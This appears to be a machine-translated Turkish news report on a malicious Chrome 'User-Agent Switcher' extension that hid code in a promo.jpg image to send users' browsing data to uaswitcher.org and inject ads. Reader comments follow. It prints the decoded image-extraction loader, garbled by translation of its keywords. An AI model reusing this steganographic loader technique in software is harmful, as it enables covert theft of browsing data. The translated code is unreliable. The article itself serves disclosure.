Kısa bir süre önce bir geliştirici, Google Chrome mağazasında Kullanıcı-Aracı Değiştirici'yi (https://chrome.google.com/webstore/detail/user-agent-switcher-for-g/ffhkkpnppgnfaobgihpdblnhmmbodake) aradığında, bu uzantıyı Google Chrome mağazasında bulmuşlardır. Bir numaralı "User-Agent Switcher" (459.604 kullanıcı), "google.com" yerine "useragentswitcher.org" tarafından sağlanan kötü amaçlı bir programdır.
Bu Google Chrome için Kullanıcı-Aracı Değiştirici sayfasındaki "Kötüye Kullanımı Bildir", aslında yararlı olmayan bir .jpg dosyası gibi görünen işe yaramaz bir bağlantıdır. Aslında, Chromeun denetim politikasını atlamak için yazar, kötü amaçlı kodu promo.jpg dosyasında gizler. Canvas öğesine yüklendiğinde ve bir şekilde kodu çözüldüğünde, tüm kullanıcı isteklerini gönderecek olan JS oluşturulur. Belirli bir etki alanına, reklamları da enjekte edecek ve bağlı kuruluş bağlantılarına yönlendirecektir.
Geliştirici @anoymoux, bu resimdeki kötü amaçlı kodun şifresini çözdü ve çalıştırdı:
t.prototype.Vh = function (t, e) {
eğer ("" === '.. / promo.jpg') "" döndür;
void 0 === t (t = '.. / promo.jpg'), t.length (t = r.Wk (t)), e = e || {};
var n = this.ET,
i = e.mp || n.mp,
o = e.Tv || n.Tv,
h = e.At || n.At,
a = r.Yb (Math.pow (2, i)),
f = (e.WC || n.WC, e.TY || n.TY),
u = document.createElement ("canvas"),
p = u.getContext ("2d");
eğer (u.style.display = "yok", u.width = e.width || t.width, u.height = e.width || t.height, 0 === u.width || 0 == = u.height) dönüş "";
e.height e.widthp.drawImage (t, 0, 0, e.width, e.height): p.drawImage (t, 0, 0);
var c = p.getImageData (0, 0, u.width, u.height),
d = c.data,
g =;
eğer (c.data.every (function (t) {
dönüş 0 === t
})) dönüş "";
var m, s;
eğer (1 === o)
için (m = 3, s =! 1;! s m < d. uzunluk! s; m + = 4) s = f (d, m, o), s || g.push (d- (255-a + 1));
var v = "",
w = 0,
y = 0,
l = Math.pow (2, h) -1;
için (m = 0; m < g. uzunluk; m + = 1) w + = g < < y, y + = i, y > = h (v + = String.fromCharCode (w ve l), y% = h, w = g > > i-y);
dönüş / uzunluk < 13? "": (0! == w (v + = String.fromCharCode (w ve l)), v)
}
Programı çalıştırdıktan sonra, kullanıcı tarafından açılan her sekmenin url ve diğer bilgilerinin şifrelenerek https://uaswitcher.org/logic/page/data adresine gönderileceği tespit edilmiştir.
Ayrıca, promosyon bağlantılarının kuralları adresinden alınacaktır. Kurallara uyan bir web sitesi açıldığında, reklamlar ve hatta kötü niyetli kod sayfaya eklenecektir.
Bu bağlamda, birçok netizen kendi fikirlerine sahiptir:
gorhill: "Google Chrome için Kullanıcı-Aracı Değiştirici", uzantı listesinde "güvenli olmayan-eval" CSP talimatı içeren bir "content_security_policy" değerine sahiptir ve özü, genişletilmiş bağlamda rastgele kod yürütmektir. Yetenek, kod incelemesi orijinal dosyayı okuyarak gerçekleştirilemez. Bu nedenle, listede belirtilen bu CSP talimatının herhangi bir uzantısının kötü niyetli bir program olduğu varsayılacaktır, bu nedenle spesifik olanı doğrulamak için daha fazla araştırma yapılması gerekir.
horsawlarway: Birçok kitaplık ve şablon artık eval kodunu kullanır. Bilinen ve güvenilir konumlardan güncelleme ve modüller alınması durumunda, eval kullanmak için geçerli nedenler olan bazıları (anahtar kelime: FEW) vardır. Bu durumlarda, kullanıcı uzantıdaki önceden paylaşılan sertifikayı sunucuyu imzalamak ve imzayı doğrulamak için kullanmazsa, o zaman sorunlar olacaktır. Uzun lafın kısası, eval hala çok kullanışlı bir özelliktir, ancak doğru ve tutumlu kullanılması gerekir.
krisgenre: Aman tanrım, bu uzantıyı kullanıyorum! Hemen silin ve Chrome mağazasında bir yedek arayın ve daha sonra Google'ın kendisi tarafından sağlanan uzantının yüklenmesi gerektiğini öğrenin.
milankragujevic: Çok üzüldüm, bu uzantıyı iki yıldır yükledim, hangi bilgileri alacaklar ve benimle ne yapacaklar? Şimdi kaldırdım.
krackers: Öğrendiğimde aynı endişelerim vardı. Tamamen kodunu çözmek için yeterli beceriye sahip değilim, ancak en azından tarama geçmişi göndereceğini ve reklamları enjekte edeceğini biliyorum. Şimdi güvenlik açısından çeşitli şifreleri değiştirdim.
Bu eklenti kurulursa, bilgisayar korsanlarının gözetimi altında olmaya eşdeğerdir, bu nedenle dikkatlice düşünmek son derece korkutucu olur.
-------- Sıcak haber incelemesi --------